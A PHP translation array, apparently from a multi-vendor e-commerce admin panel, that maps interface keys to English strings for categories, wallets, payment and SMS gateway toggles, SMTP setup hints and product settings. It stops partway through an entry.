'Attribute Name', 'enter_Attribute_Name' => 'Enter Attribute Name', 'attribute_list' => 'Attribute list', 'search_by_Attribute_Name' => 'Search by Attribute Name', 'you_will not_be_able_to_revert_this' => 'You will not be able to revert this', 'attribute_deleted_successfully' => 'Attribute deleted successfully', 'all_shop' => 'All shop', 'Deluxe Online' => 'Deluxe Online', 'Mart Morning' => 'Mart Morning', 'Wellness Fair' => 'Wellness Fair', 'Bicycle Shop' => 'Bicycle Shop', 'KR Fashion' => 'KR Fashion', 'Country Fair' => 'Country Fair', 'Morning Mart' => 'Morning Mart', 'Royal Crown' => 'Royal Crown', 'Super Store Online' => 'Super Store Online', 'Digital Seller' => 'Digital Seller', 'Hello Store' => 'Hello Store', 'rating_High_to_Low' => 'Rating High to Low', 'rating_Low_to_High' => 'Rating Low to High', 'highest_Products' => 'Highest Products', 'lowest_Products' => 'Lowest Products', 'select_date_range' => 'Select date range', 'Great Hall' => 'Great Hall', 'Tell us' => 'Tell us', 'Arkohub' => 'Arkohub', 'Centre Point' => 'Centre Point', 'TrueMake' => 'TrueMake', 'The Wall' => 'The Wall', 'Dynamova' => 'Dynamova', 'Crave' => 'Crave', 'Framerce' => 'Framerce', 'Modentum' => 'Modentum', 'Axxelus' => 'Axxelus', 'Vivatiqo' => 'Vivatiqo', 'Digital Product House' => 'Digital Product House', 'Women s fashion' => 'Women s fashion', 'Men s fashion' => 'Men s fashion', 'Outdoor Fun & Sports' => 'Outdoor Fun & Sports', 'Toys Kids & Babies' => 'Toys Kids & Babies', 'Jewelry & Watches' => 'Jewelry & Watches', 'Beauty Health & Hair' => 'Beauty Health & Hair', 'Home Improvement & Tools' => 'Home Improvement & Tools', 'Computer Office & Security' => 'Computer Office & Security', 'Phones & Telecom' => 'Phones & Telecom', 'Bags & Shoes' => 'Bags & Shoes', 'Home Pet & Appliances' => 'Home Pet & Appliances', 'eBook' => 'EBook', 'Applications' => 'Applications', 'sub_categories' => 'Sub categories', 'all_sub_categories' => 'All sub categories', 'Shoes' => 'Shoes', 'Dress' => 'Dress', 'Jewelry' => 'Jewelry', 'Watches' => 'Watches', 'Story Book' => 'Story Book', 'Cooking Recipe' => 'Cooking Recipe', 'sub_sub_categories' => 'Sub sub categories', 'all_sub_sub_categories' => 'All sub sub categories', 'regular wear' => 'Regular wear', 'Comic Book' => 'Comic Book', 'Biography' => 'Biography', 'walking customer' => 'Walking customer', 'welcome_to_your_dashboard' => 'Welcome to your dashboard', 'welcome_to' => 'Welcome to', 'Easy Electronics' => 'Easy Electronics', 'Digital Spot' => 'Digital Spot', 'Electronic Agile' => 'Electronic Agile', 'Bazaar' => 'Bazaar', 'B. Store' => 'B. Store', 'Click & Collect' => 'Click & Collect', 'Online Shop' => 'Online Shop', 'Eratmart' => 'Eratmart', 'cgbfghnb' => 'Cgbfghnb', 'Order_is_already_delivered_and_transaction_amount_has_been_disbursed_changing_status_can_be_the_reason_of_miscalculation' => 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation', 'reorder' => 'Reorder', 'Reorder' => 'Reorder', 'my_Wallet' => 'My Wallet', 'if_you_want_to_add_fund_to_your_wallet_then_click_add_fund_button' => 'If you want to add fund to your wallet then click add fund button', 'add_fund_by_from_secured_digital_payment_gateways' => 'Add fund by from secured digital payment gateways', 'payment_Methods' => 'Payment Methods', 'faster_&_secure_way_to_pay_bill' => 'Faster & secure way to pay bill', 'all_Transaction' => 'All Transaction', 'converted_from_loyalty_point' => 'Converted from loyalty point', 'added_via_payment_method' => 'Added via payment method', 'earned_by_referral' => 'Earned by referral', 'leave_a_comment' => 'Leave a comment', 'file_type' => 'File type', 'maximum_size' => 'Maximum size', 'see_all_products' => 'See all products', 'total_balance' => 'Total balance', 'earn_money _o_your_wallet_by_completing_the_offer_&_challenged' => 'Earn money o your wallet by completing the offer & challenged', 'convert_your_loyalty_points_into_wallet_money' => 'Convert your loyalty points into wallet money', 'admin_also_rewards_their_top_customers_with_wallet_money' => 'Admin also rewards their top customers with wallet money', 'send_your_wallet_money_while_order' => 'Send your wallet money while order', 'the_amount_needs_to_be_between' => 'The amount needs to be between', 'add_fund_to_wallet_success' => 'Add fund to wallet success', 'old' => 'Old', 'check_all_order' => 'Check all order', 'add funds to wallet' => 'Add funds to wallet', 'order payment' => 'Order payment', 'fwrf' => 'Fwrf', 'order refund' => 'Order refund', 'point to wallet' => 'Point to wallet', 'from admin' => 'From admin', 'wallet_Bonus_Added_Successfully' => 'Wallet Bonus Added Successfully', 'status_Update_Successfully' => 'Status Update Successfully', 'customer_wallet_bonus_edit' => 'Customer wallet bonus edit', 'wallet_bonus_edit' => 'Wallet bonus edit', 'bonus_removed_Successfully' => 'Bonus removed Successfully', 'Infinity' => 'Infinity', 'Techno Lab' => 'Techno Lab', 'Electronics' => 'Electronics', 'E- tech' => 'E- tech', 'Digi Tech' => 'Digi Tech', 'Electron Pro' => 'Electron Pro', 'Digital Technology' => 'Digital Technology', 'Tech Light' => 'Tech Light', 'B. Technology' => 'B. Technology', 'Connection' => 'Connection', 'Camera Accessories' => 'Camera Accessories', 'Gadgets' => 'Gadgets', 'Laptop Tabs & Notebooks' => 'Laptop Tabs & Notebooks', 'Smartphone' => 'Smartphone', 'Network Components' => 'Network Components', 'Computer & Office' => 'Computer & Office', 'Mobile Accessories' => 'Mobile Accessories', 'TV & Home Appliance' => 'TV & Home Appliance', 'Audio' => 'Audio', 'Wearable' => 'Wearable', 'Consumer electronics' => 'Consumer electronics', 'Headphones' => 'Headphones', 'Charger' => 'Charger', 'Cable & Converters' => 'Cable & Converters', 'Bluetooth Speaker' => 'Bluetooth Speaker', 'Phone Case' => 'Phone Case', 'Wireless Earbuds' => 'Wireless Earbuds', 'Microphones' => 'Microphones', 'Television' => 'Television', 'Refrigerator' => 'Refrigerator', 'Microwaves' => 'Microwaves', 'Air Conditioner' => 'Air Conditioner', 'Router' => 'Router', 'Printer' => 'Printer', 'Keyboard & Mouse' => 'Keyboard & Mouse', 'Webcam' => 'Webcam', 'Man Watch' => 'Man Watch', 'Ladies Watch' => 'Ladies Watch', 'Smart Watch' => 'Smart Watch', 'Laptop cooler' => 'Laptop cooler', 'Hard disk' => 'Hard disk', 'Computer Ram' => 'Computer Ram', 'Power supply unit' => 'Power supply unit', 'SSD' => 'SSD', 'Digital Files' => 'Digital Files', 'Classic' => 'Classic', 'Internet Cable' => 'Internet Cable', 'Gamming Laptop' => 'Gamming Laptop', 'Central Air Conditioner.' => 'Central Air Conditioner.', 'Geothermal Air Conditioner' => 'Geothermal Air Conditioner', 'Portable Air Conditioner' => 'Portable Air Conditioner', 'Top Freezer Refrigerator' => 'Top Freezer Refrigerator', 'Digital Watches' => 'Digital Watches', 'Wireless' => 'Wireless', 'Mechanical' => 'Mechanical', 'Double Fan' => 'Double Fan', 'want_to_delete_this_item ' => 'Want to delete this item ', 'select_Sub_Category' => 'Select Sub Category', 'select_Sub_Sub_Category' => 'Select Sub Sub Category', 'select_Brand' => 'Select Brand', 'digital_file_ready' => 'Digital file ready', 'enter_tag' => 'Enter tag', 'image_format' => 'Image format', 'image_size' => 'Image size', 'must_upload_colour_wise_images_first._Colour_is_shown_in_the_image_section_top_right.' => 'Must upload colour wise images first. Colour is shown in the image section top right.', 'upload_additional_product_images' => 'Upload additional product images', 'total_point' => 'Total point', 'convert_your_loyalty_point_to_wallet_money.' => 'Convert your loyalty point to wallet money.', 'minimum_' => 'Minimum ', 'point_transaction_history' => 'Point transaction history', 'enters_point_amount' => 'Enters point amount', 'convert_point_to_wallet_money' => 'Convert point to wallet money', 'converted_amount' => 'Converted amount', 'only_earning_point_can_converted_to_wallet_money' => 'Only earning point can converted to wallet money', 'point_is_equal_to' => 'Point is equal to', 'Once_you_convert_the_point_into_money_then_it_won`t_back_to_point' => 'Once you convert the point into money then it won`t back to point', 'point_can_earn_by_placing_order_or_referral' => 'Point can earn by placing order or referral', 'delivery_Man_Settings' => 'Delivery Man Settings', 'upload_Picture_on_Delivery' => 'Upload Picture on Delivery', 'admin_can_set_whether_deliveryman_needs_to_upload_the_picture_of_delivery_by_enabling_or_disabling_this_button' => 'Admin can set whether deliveryman needs to upload the picture of delivery by enabling or disabling this button', 'by_Turning_ON_Picture_Upload_on_Delivery' => 'By Turning ON Picture Upload on Delivery', 'by_Turning_OFF_Picture_Upload_on_Delivery' => 'By Turning OFF Picture Upload on Delivery', 'if_enabled_deliverymen_can_upload_picture_at_the_order_deliveries_time' => 'If enabled deliverymen can upload picture at the order deliveries time', 'if_enabled_deliverymen_can_not_upload_picture_at_the_order_deliveries_time' => 'If enabled deliverymen can not upload picture at the order deliveries time', 'Updated_successfully' => 'Updated successfully', 'no_delivery_man_assigned' => 'No delivery man assigned', 884796 => '884796', 'Verification_Code' => 'Verification Code', 'payment_methods' => 'Payment methods', 'if_enabled _the_cash_on_delivery_option_will_be_available_on_the_system._Customers_can_use_COD_as_a_payment_option' => 'If enabled the cash on delivery option will be available on the system. Customers can use COD as a payment option', 'want_to_Turn_On_the_Cash_On_Delivery_option' => 'Want to Turn On the Cash On Delivery option', 'want_to_Turn_Off_the_Cash_On_Delivery_option' => 'Want to Turn Off the Cash On Delivery option', 'if_enabled_customers_can_select_Cash_on_Delivery_as_a_payment_method_during_checkout' => 'If enabled customers can select Cash on Delivery as a payment method during checkout', 'if_disabled_the Cash_on_Delivery_payment_method_will_be_hidden_from_the_checkout_page' => 'If disabled the Cash on Delivery payment method will be hidden from the checkout page', 'if_enabled _customers_can_choose_digital_payment_options_during_the_checkout_process' => 'If enabled customers can choose digital payment options during the checkout process', 'want_to_Turn_On_the_Digital_Payment_option' => 'Want to Turn On the Digital Payment option', 'want_to_Turn_Off_the_Digital_Payment_option' => 'Want to Turn Off the Digital Payment option', 'if_enabled_customers_can_select_Digital_Payment_during_checkout' => 'If enabled customers can select Digital Payment during checkout', 'if_disabled_Digital_Payment_options_will_be_hidden_from_the_checkout_page' => 'If disabled Digital Payment options will be hidden from the checkout page', 'offline_Payment_allows_customers_to_use_external_payment_methods._They_must_share_payment_details_with_the_seller_afterward._Admin_can_set_whether_customers_can_make_offline_payments_by_enabling/disabling_this_button. ' => 'Offline Payment allows customers to use external payment methods. They must share payment details with the seller afterward. Admin can set whether customers can make offline payments by enabling/disabling this button. ', 'want_to_Turn_On_the_Offline_Payment_option' => 'Want to Turn On the Offline Payment option', 'want_to_Turn_Off_the_Offline_Payment_option' => 'Want to Turn Off the Offline Payment option', 'if_enabled_customers_can_pay_through_external_payment_methods' => 'If enabled customers can pay through external payment methods', 'if_disabled_customers_have_to_use_the_system-added_payment_gateways' => 'If disabled customers have to use the system-added payment gateways', 'want_to_Turn_On_' => 'Want to Turn On ', '_as_the_Digital_Payment_method' => ' as the Digital Payment method', 'want_to_Turn_Off_' => 'Want to Turn Off ', 'if_enabled_customers_can_use_this_payment_method' => 'If enabled customers can use this payment method', 'if_disabled_this_payment_method_will_be_hidden_from_the_checkout_page' => 'If disabled this payment method will be hidden from the checkout page', 'mail_configuration' => 'Mail configuration', 'send_test_mail' => 'Send test mail', 'enter_mailer_name' => 'Enter mailer name', 'alex' => 'Alex', 'enter_the_name_of_the_host_of_your_mailing_service' => 'Enter the name of the host of your mailing service', 'smtp.mailtrap.io' => 'Smtp.mailtrap.io', 'enter_the_driver_for_your_mailing_service' => 'Enter the driver for your mailing service', 'smtp' => 'Smtp', 'enter_the_port_number_for_your_mailing_service' => 'Enter the port number for your mailing service', 'enter_the_username_of_your_account' => 'Enter the username of your account', 'ex : yahoo' => 'Ex : yahoo', 'email_ID' => 'Email ID', 'enter_your_email_ID' => 'Enter your email ID', 'example@example.com' => 'Example@example.com', 'enter_the_encryption_type' => 'Enter the encryption type', 'ex :' => 'Ex :', 'tls' => 'Tls', 'enter_your_password' => 'Enter your password', 'ex : Alex' => 'Ex : Alex', 'ex: mail.google.one' => 'Ex: mail.google.one', 'ex: salam' => 'Ex: salam', 'ex: 587' => 'Ex: 587', 'ex : ex@yahoo.com' => 'Ex : ex@yahoo.com', 'ex : tls' => 'Ex : tls', 'ex : 123456' => 'Ex : 123456', 'free_delivery_over_amount_for_every_seller_if_they_do_not_set_any_range_yet' => 'Free delivery over amount for every seller if they do not set any range yet', 'currently_you_are_managing_banners_for_' => 'Currently you are managing banners for ', 'these_saved_data_is_only_applicable_only_for_' => 'These saved data is only applicable only for ', 'if_you_change_theme_from_theme_setup_these_banners_will_not_be_shown_in_changed_theme._You_have_upload_all_the_banners_over_again _according_to_the_new_theme_ratio_and_sizes._If_you_switch_back_to_' => 'If you change theme from theme setup these banners will not be shown in changed theme. You have upload all the banners over again according to the new theme ratio and sizes. If you switch back to ', '_again_ _you_will_see_the_saved_data.' => ' again you will see the saved data.', 'banner_image_ratio_is_not_same_for_all_sections_in_website.Please_review_the_ratio_before_upload' => 'Banner image ratio is not same for all sections in website.Please review the ratio before upload', 'banner_image' => 'Banner image', 'banner_added_successfully' => 'Banner added successfully', 'now_you’ll_be_successfully_able_to_use_the_theme_for_your' => 'Now you’ll be successfully able to use the theme for your', 'N:B you_can_upload_only' => 'N:B you can upload only', 'theme_templates' => 'Theme templates', 'drag_&_drop_file_or_browse_file' => 'Drag & drop file or browse file', 'agent_number' => 'Agent number', 'paid_phone_number' => 'Paid phone number', 'Paid Phone Number' => 'Paid Phone Number', 'Transaction Id' => 'Transaction Id', '01-08-2023' => '01-08-2023', 'account_number' => 'Account number', 'Account Name' => 'Account Name', 'payer_name' => 'Payer name', 'Payer Name' => 'Payer Name', 'see_more' => 'See more', 'come_back_soon' => 'Come back soon', 'want_to_Turn_ON_the_Cash_On_Delivery_option' => 'Want to Turn ON the Cash On Delivery option', 'want_to_Turn_OFF_the_Cash_On_Delivery_option' => 'Want to Turn OFF the Cash On Delivery option', 'want_to_Turn_ON_the_Digital_Payment_option' => 'Want to Turn ON the Digital Payment option', 'want_to_Turn_OFF_the_Digital_Payment_option' => 'Want to Turn OFF the Digital Payment option', 'want_to_Turn_ON_the_Offline_Payment_option' => 'Want to Turn ON the Offline Payment option', 'want_to_Turn_OFF_the_Offline_Payment_option' => 'Want to Turn OFF the Offline Payment option', 'want_to_Turn_ON_' => 'Want to Turn ON ', 'want_to_Turn_OFF_' => 'Want to Turn OFF ', 'google_map_API_setup' => 'Google map API setup', 'credential_setup' => 'Credential setup', 'whatsapp_number' => 'Whatsapp number', 'find_SMTP_server_details' => 'Find SMTP server details', 'contact_your_email_service_provider_or_IT_administrator_to_obtain_the_SMTP_server_details _such_as_hostname _port _username _and_password' => 'Contact your email service provider or IT administrator to obtain the SMTP server details such as hostname port username and password', 'if_you`re_not_sure_where_to_find_these_details _check_the_email_provider`s_documentation_or_support_resources_for_guidance' => 'If you`re not sure where to find these details check the email provider`s documentation or support resources for guidance', 'configure_SMTP_settings' => 'Configure SMTP settings', 'go_to_the_SMTP_mail_setup_page_in_the_admin_panel' => 'Go to the SMTP mail setup page in the admin panel', 'enter_the_obtained_SMTP_server_details _including_the_hostname _port _username _and password' => 'Enter the obtained SMTP server details including the hostname port username and password', 'choose_the_appropriate_encryption_method' => 'Choose the appropriate encryption method', 'if_required' => 'If required', 'save_the_settings' => 'Save the settings', 'test_SMTP_connection' => 'Test SMTP connection', 'click_on_the' => 'Click on the', 'button_to_verify_the_SMTP_connection' => 'Button to verify the SMTP connection', 'if_successful _you_will_see_a_confirmation_message_indicating_that_the_connection_is_working_fine' => 'If successful you will see a confirmation message indicating that the connection is working fine', 'if_not _double-check_your_SMTP_settings_and_try_again' => 'If not double-check your SMTP settings and try again', 'if_you`re_unsure_about_the_SMTP_settings _contact_your_email_service_provider_or_IT_administrator_for_assistance' => 'If you`re unsure about the SMTP settings contact your email service provider or IT administrator for assistance', 'enable_mail_configuration' => 'Enable mail configuration', 'if_the_SMTP_connection_test_is_successful _you_can_now_enable_the_mail_configuration_services_by_toggling_the_switch_to_ ON ' => 'If the SMTP connection test is successful you can now enable the mail configuration services by toggling the switch to ON ', 'this_will_allow_the_system_to_send_emails_using_the_configured_SMTP_settings' => 'This will allow the system to send emails using the configured SMTP settings', 'send_a_test_mail_to_your_email' => 'Send a test mail to your email', 'a_test_mail_will_be_send_to_your_email_to' => 'A test mail will be send to your email to', 'confirm_it_works_perfectly' => 'Confirm it works perfectly', 'transaction id' => 'Transaction id', 'product_Setup' => 'Product Setup', 'Re-Order_Level' => 'Re-Order Level', 'set_the_stock_limit_for_the_Reorder_level' => 'Set the stock limit for the Reorder level', 'sellers_can_see_all_products_that_need_to_be_re_stocked_in_a_section_when_they_reach_this_ReOrder_Level' => 'Sellers can see all products that need to be re stocked in a section when they reach this ReOrder Level', 'sell_Digital_product' => 'Sell Digital product', 'if_enabled_sellers_can_sell_digital_products' => 'If enabled sellers can sell digital products', 'software' => 'Software', 'ebooks' => 'Ebooks', 'activation_keys' => 'Activation keys', 'in_their_shops' => 'In their shops', 'want_to_Turn_OFF_Digital_Product' => 'Want to Turn OFF Digital Product', 'want_to_Turn_ON_Digital_Product' => 'Want to Turn ON Digital Product', 'If_disabled_sellers_can_not_sell_digital_products_in_their_shops' => 'If disabled sellers can not sell digital products in their shops', 'If_enabled_sellers_can_sell_digital_products_in_their_shops' => 'If enabled sellers can sell digital products in their shops', 'show_brand' => 'Show brand', 'if_enabled_customers_can_see_brands_on_the_app_and_website' => 'If enabled customers can see brands on the app and website', 'they_can_browse_and_search_for_products_from_each_brand_inside_any_shop' => 'They can browse and search for products from each brand inside any shop', 'want_to_Turn_OFF_Product_Brand' => 'Want to Turn OFF Product Brand', 'want_to_Turn_ON_Product_Brand' => 'Want to Turn ON Product Brand', 'if_disabled_brand_section_will_be_hidden_from_the_customer_app_and_website' => 'If disabled brand section will be hidden from the customer app and website', 'promotional_Banners' => 'Promotional Banners', 'admin_Login_Page' => 'Admin Login Page', 'admin_login_url' => 'Admin login url', 'Add_dynamic_url_to_secure_admin_login_access.' => 'Add dynamic url to secure admin login access.', 'employee_Login_Page' => 'Employee Login Page', 'employee_login_url' => 'Employee login url', 'Add_dynamic_url_to_secure_employee_login_access.' => 'Add dynamic url to secure employee login access.', 'Updated_unsuccessful' => 'Updated unsuccessful', 'minimum_Order_Amount' => 'Minimum Order Amount', 'you_Get_Free_Delivery_Bonus' => 'You Get Free Delivery Bonus', 'check_Minimum_Order_Amount_Requirment' => 'Check Minimum Order Amount Requirment', 'email_not_found' => 'Email not found', 'roduct_list' => 'Roduct list', 'Product_List' => 'Product List', 'brand_Add' => 'Brand Add', 'brand_Setup' => 'Brand Setup', 'brand_Name' => 'Brand Name', 'product_Bulk_Import' => 'Product Bulk Import', 'download_the_format_file_and_fill_it_with_proper_data.' => 'Download the format file and fill it with proper data.', 'you_can_download_the_example_file_to_understand_how_the_data_must_be_filled.' => 'You can download the example file to understand how the data must be filled.', 'once_you_have_downloaded_and_filled_the_format_file' => 'Once you have downloaded and filled the format file', 'upload_it_in_the_form_below_and_submit.' => 'Upload it in the form below and submit.', 'after_uploading_products_you_need_to_edit_them_and_set_product_images_and_choices.' => 'After uploading products you need to edit them and set product images and choices.', 'you_can_get_brand_and_category_id_from_their_list_please_input_the_right_ids.' => 'You can get brand and category id from their list please input the right ids.', 'you_can_upload_your_product_images_in_product_folder_from_gallery_and_copy_image_path.' => 'You can upload your product images in product folder from gallery and copy image path.', 'do_not_have_the_template' => 'Do not have the template', 'new_Products_Requests' => 'New Products Requests', 'product_Updated_Requests' => 'Product Updated Requests', 'announcements' => 'Announcements', 'contact_List' => 'Contact List', 'customer_message_table' => 'Customer message table', 'search_by_Name_or_Mobile_No_or_Email' => 'Search by Name or Mobile No or Email', 'customer_Name' => 'Customer Name', 'contact_Info' => 'Contact Info', 'contact_deleted_successfully' => 'Contact deleted successfully', 'help_&_support' => 'Help & support', 'Withdraw_Request_Table' => 'Withdraw Request Table', 'mobile_number' => 'Mobile number', 'sales_Commission' => 'Sales Commission', 'if_sales_commission_is_disabled_here_the_system_default_commission_will_be_applied' => 'If sales commission is disabled here the system default commission will be applied', 'GST_Number' => 'GST Number', 'if_GST_number_is_disabled_here_it_will_not_show_in_invoice' => 'If GST number is disabled here it will not show in invoice', 'seller_POS' => 'Seller POS', 'Seller_POS_permission_on_or_off' => 'Seller POS permission on or off', 'turn_on' => 'Turn on', 'turn_off' => 'Turn off', 'review_list' => 'Review list', 'not_assign_yet' => 'Not assign yet', 'track_ID' => 'Track ID', 'want_to_delete_this_coupon ' => 'Want to delete this coupon ', 'coupon_applied_successfully' => 'Coupon applied successfully', 'offline_Payment' => 'Offline Payment', 'no_shipping_method_selected' => 'No shipping method selected', 'delivery_fee_discount' => 'Delivery fee discount', 'order_Placed_Successfully' => 'Order Placed Successfully', 'your_Order_ID' => 'Your Order ID', 'you_can_use_this_ID_to_track_your_order_later' => 'You can use this ID to track your order later', 'bearer' => 'Bearer', 'expense_Transaction_Statement' => 'Expense Transaction Statement', 'open_your_shop_and_start_selling.' => 'Open your shop and start selling.', 'password_does_not_match' => 'Password does not match', 'please_type_verify_code' => 'Please type verify code', 'brand' => 'Brand', 'total_Expense_Amount' => 'Total Expense Amount', 'free_Delivery_Amount' => 'Free Delivery Amount', 'coupon_Discount_Amount' => 'Coupon Discount Amount', 'free_Shipping_Over_Order_Amount_Discount' => 'Free Shipping Over Order Amount Discount', 'search_by_orders_id_or_refund_id' => 'Search by orders id or refund id', 'stores_one' => 'Stores one', 'stores_two' => 'Stores two', 'all_customers' => 'All customers', 'customer_one' => 'Customer one', 'customer_two' => 'Customer two', 'total_transactions' => 'Total transactions', 'search_product_name' => 'Search product name', 'fixed' => 'Fixed', 'recurring' => 'Recurring', 'all_Products' => 'All Products', 'product_Stock' => 'Product Stock', 'wish_Listed_Products' => 'Wish Listed Products', 'total_Product_Sale' => 'Total Product Sale', 'total_Discount_Given' => 'Total Discount Given', 'product_Statistics' => 'Product Statistics', 'the_product_report_will_show_based_on_the_product_added_date' => 'The product report will show based on the product added date', 'product_Unit_Price' => 'Product Unit Price', 'total_Amount_Sold' => 'Total Amount Sold', 'total_Quantity_Sold' => 'Total Quantity Sold', 'average_Product_Value' => 'Average Product Value', 'current_Stock_Amount' => 'Current Stock Amount', 'average_Ratings' => 'Average Ratings', 'last_Updated_Stock' => 'Last Updated Stock', 'current_Stock' => 'Current Stock', 'out_of_Stock' => 'Out of Stock', 'soon_Stock_Out' => 'Soon Stock Out', 'in-Stock' => 'In-Stock', 'total_in_Wishlist' => 'Total in Wishlist', 'no_data_to_found' => 'No data to found', 'Settings_updated' => 'Settings updated', 'Message_updated' => 'Message updated', 'in_House_Order' => 'In House Order', 'seller_Order' => 'Seller Order', 'total_In-House_Products' => 'Total In-House Products', 'admin_Net_Income' => 'Admin Net Income', '32 inches Android Smart TV (4GB RAM and 8GB ROM)' => '32 inches Android Smart TV (4GB RAM and 8GB ROM)', 'maximum_file_size' => 'Maximum file size', 'have_to_upload_zip_file' => 'Have to upload zip file', 'please_be_reminded_that_you_have_to_setup_data_for_these_section_for' => 'Please be reminded that you have to setup data for these section for', 'Banners' => 'Banners', 'user_app_version_control' => 'User app version control', 'for_android' => 'For android', 'minimum_Customer_App_Version' => 'Minimum Customer App Version', 'the_minimum_customer_app_version_required_for_the_app_functionality' => 'The minimum customer app version required for the app functionality', 'ex: 2.1' => 'Ex: 2.1', 'download_URL_For_Customer_App' => 'Download URL For Customer App', 'customers_will_download_the_latest_customer_app_version_using_this_URL' => 'Customers will download the latest customer app version using this URL', 'for_ios' => 'For ios', 'seller_app_version_control' => 'Seller app version control', 'minimum_Seller_app_version' => 'Minimum Seller app version', 'the_minimum_seller_app_version_required_for_the_app_functionality' => 'The minimum seller app version required for the app functionality', 'download_URL_For_Seller_App' => 'Download URL For Seller App', 'sellers_will_download_the_latest_seller_app_version_using_this_URL' => 'Sellers will download the latest seller app version using this URL', 'delivery_man_app_version_control' => 'Delivery man app version control', 'minimum_Deliveryman_App_Version' => 'Minimum Deliveryman App Version', 'the_minimum_deliveryman_app_version_required_for_the_app_functionality' => 'The minimum deliveryman app version required for the app functionality', 'download_URL_For_Deliveryman_App' => 'Download URL For Deliveryman App', 'deliverymen_will_download_the_latest_deliveryman_app_version_using_this_URL' => 'Deliverymen will download the latest deliveryman app version using this URL', 'what_is_App_Version' => 'What is App Version', 'this_app_version_means_the_minimum_version_of_Seller_Deliveryman_and_Customer_apps_that_are_required_for_the_update' => 'This app version means the minimum version of Seller Deliveryman and Customer apps that are required for the update', 'it_does_not_represent_the_Play_Store_or_App_Store_version' => 'It does not represent the Play Store or App Store version', 'app_Download_Link' => 'App Download Link', 'the_app_download_link_is_the_URL_that_allows_users_to_update_the_app_by_clicking_the_Update_App_button_within_the_app_itself' => 'The app download link is the URL that allows users to update the app by clicking the Update App button within the app itself', 'your_current_sms_settings_are_disabled _because_you_have_enabled_sms_gateway_addon' => 'Your current sms settings are disabled because you have enabled sms gateway addon', 'To_visit_your_currently_active_sms_gateway_settings_please_follow_the_link.' => 'To visit your currently active sms gateway settings please follow the link.', 'want_to_turn_ON_releans' => 'Want to turn ON releans', 'want_to_turn_OFF_releans' => 'Want to turn OFF releans', 'if_enabled _this_SMS_service_will_be_available_in_the_system' => 'If enabled this SMS service will be available in the system', 'if_disabled _this_SMS_service_will_be_hidden_from_the_system ' => 'If disabled this SMS service will be hidden from the system ', 'want_to_turn_ON_twilio_sms' => 'Want to turn ON twilio sms', 'want_to_turn_OFF_twilio_sms' => 'Want to turn OFF twilio sms', 'want_to_turn_ON_nexmo_sms' => 'Want to turn ON nexmo sms', 'want_to_turn_OFF_nexmo_sms' => 'Want to turn OFF nexmo sms', 'want_to_turn_ON_twofactor_sms' => 'Want to turn ON twofactor sms', 'want_to_turn_OFF_twofactor_sms' => 'Want to turn OFF twofactor sms', 'want_to_turn_ON_msg91_sms' => 'Want to turn ON msg91 sms', 'want_to_turn_OFF_msg91_sms' => 'Want to turn OFF msg91 sms', 'SMS_gateway_title' => 'SMS gateway title', 'SMS_Gateway_Title' => 'SMS Gateway Title', '_as_the_SMS_Gateway' => ' as the SMS Gateway', 'if_enabled_system_can_use_this_SMS_Gateway' => 'If enabled system can use this SMS Gateway', 'if_disabled_system_cannot_use_this_SMS_Gateway' => 'If disabled system cannot use this SMS Gateway', 'upload_max_filesize' => 'Upload max filesize', 'post_max_size' => 'Post max size', 'The_file_upload_field_is_required' => 'The file upload field is required', 'first_name_is_required' => 'First name is required', 'email_already_has_been_taken' => 'Email already has been taken', 'phone_number_already_has_been_taken' => 'Phone number already has been taken', 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product' => 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product', 'customer_Information' => 'Customer Information', 'edit_Customer' => 'Edit Customer', 'tag' => 'Tag', 'Customer_review' => 'Customer review', 'OFF' => 'OFF', 'now' => 'Now', 'add_fund_to_wallet' => 'Add fund to wallet', 'and_enjoy' => 'And enjoy', 'bonus' => 'Bonus', 'all_Transactions' => 'All Transactions', 'please_select_a_payment_Methods' => 'Please select a payment Methods', 'if_enabled_sellers_can_sell_digital_products_in_their_shops' => 'If enabled sellers can sell digital products in their shops', 'if_disabled_sellers_can_not_sell_digital_products_in_their_shops' => 'If disabled sellers can not sell digital products in their shops', 'minimum_amount_can_not_be_greater_than_maximum_amount' => 'Minimum amount can not be greater than maximum amount', 'Tech Shop' => 'Tech Shop', 'Gil Watkins' => 'Gil Watkins', 'qwert' => 'Qwert', 'bank_information' => 'Bank information', 'file_not_found' => 'File not found', 'No_country_to_deliver' => 'No country to deliver', 'business_setup' => 'Business setup', 't_id' => 'T id', 'Account _number' => 'Account number', 'account_holder_name' => 'Account holder name', 'qwertyu' => 'Qwertyu', 'Theme Changed to Theme Aster' => 'Theme Changed to Theme Aster', 'Theme Changed to Theme Fashion' => 'Theme Changed to Theme Fashion', 'product asdfghjkl ' => 'Product asdfghjkl ', 'all_brands_page' => 'All brands page', 'search_brand' => 'Search brand', 'update_to_cart' => 'Update to cart', 'cart_updated' => 'Cart updated', 'item_details' => 'Item details', 'item_discount' => 'Item discount', 'tax_incl.' => 'Tax incl.', 'deliveryman_can_not_assign_or_change_in_that_status' => 'Deliveryman can not assign or change in that status', 'items_Price' => 'Items Price', 'THANK_YOU' => 'THANK YOU', 'for_“Ready_Product”_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products_by_admin._For_“Ready_After_Sale”_deliveries _customers_pay_first _then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'For “Ready Product” deliveries customers can pay & instantly download pre-uploaded digital products by admin. For “Ready After Sale” deliveries customers pay first then admin uploads the digital products that become available to customers for download', 'upload_the_digital_products_from_here' => 'Upload the digital products from here', 'create_a_unique_product_code_by_clicking_on_the_“Generate_Code”_button' => 'Create a unique product code by clicking on the “Generate Code” button', 'add_the_purchase_price_for_this_product' => 'Add the purchase price for this product', 'set_the_selling_price_for_each_unit_of_this_product._This_Unit_Price_section_won’t_be_applied_if_you_set_a_variation_wise_price' => 'Set the selling price for each unit of this product. This Unit Price section won’t be applied if you set a variation wise price', 'set_the_minimum_order_quantity_that_customers_must_choose._Otherwise _the_checkout_process_won’t_start' => 'Set the minimum order quantity that customers must choose. Otherwise the checkout process won’t start', 'add_the_Stock_Quantity_of_this_product_that_will_be_visible_to_customers' => 'Add the Stock Quantity of this product that will be visible to customers', 'if_“Flat” _discount_amount_will_be_set_as_fixed_amount._If_“Percentage” _discount_amount_will_be_set_as_percentage.' => 'If “Flat” discount amount will be set as fixed amount. If “Percentage” discount amount will be set as percentage.', 'add_the_discount_amount_in_percentage_or_a_fixed_value_here' => 'Add the discount amount in percentage or a fixed value here', 'set_the_Tax_Amount_in_percentage_here' => 'Set the Tax Amount in percentage here', 'if_enabled 